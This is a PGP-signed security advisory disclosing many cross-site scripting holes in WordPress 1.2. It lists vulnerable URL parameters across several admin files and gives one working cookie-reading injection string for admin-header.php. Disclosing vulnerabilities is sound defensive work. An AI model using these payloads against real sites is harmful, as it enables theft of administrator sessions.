-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Multiple XSS Vulnerabilities in Wordpress 1.2 URL: http://wordpress.org/ Version: Wordpress 1.2 Risk: XSS Description: WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. [...] Go to http://wordpress.org/ for detailed information. Cross Site Scripting: > wp-login.php: /wp-login.php?redirect_to=[XSS] /wp-login.php?mode=bookmarklet&text=[XSS] /wp-login.php?mode=bookmarklet&popupurl=[XSS] /wp-login.php?mode=bookmarklet&popuptitle=[XSS] Nearly every file in the administration panel of wordpress is vulnerable for XSS attacks. > admin-header.php: /admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)// Nice bug. ;o) > bookmarklet.php: /bookmarklet.php?popuptitle=[XSS] /bookmarklet.php?popupurl=[XSS] /bookmarklet.php?content=[XSS] /bookmarklet.php?post_title=[XSS] > categories.php: /categories.php?action=edit&cat_ID=[XSS] > edit.php: /edit.php?s=[XSS] > edit-comments.php: /edit-comments.php?s=[XSS] /edit-comments.php?mode=[XSS] and so on ... Solution: There is not any solution yet. I contacted Matthew Mullenweg, one of the lead developers of wordpress, on Wednesday but I did not receive any answer until yet. Credits: Thomas Waldegger -----BEGIN PGP SIGNATURE----- Version: n/a Comment: http://morph3us.org/ iD8DBQFD9X/8kCo6/ctnOpYRAzjyAJ9h4Auu2GzsmfJlwl/yJ4bJZBltYgCfSdGl Kj4s+Tgsx+E6KsRAw1rDDK4= =8UmG -----END PGP SIGNATURE-----